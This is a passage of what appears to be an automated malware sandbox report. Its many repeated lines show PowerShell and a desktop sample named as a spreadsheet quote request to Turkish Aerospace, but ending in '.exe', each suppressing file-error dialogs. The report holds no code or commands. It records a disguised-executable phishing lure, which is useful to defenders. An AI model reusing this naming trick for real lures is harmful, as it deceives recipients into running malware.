Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
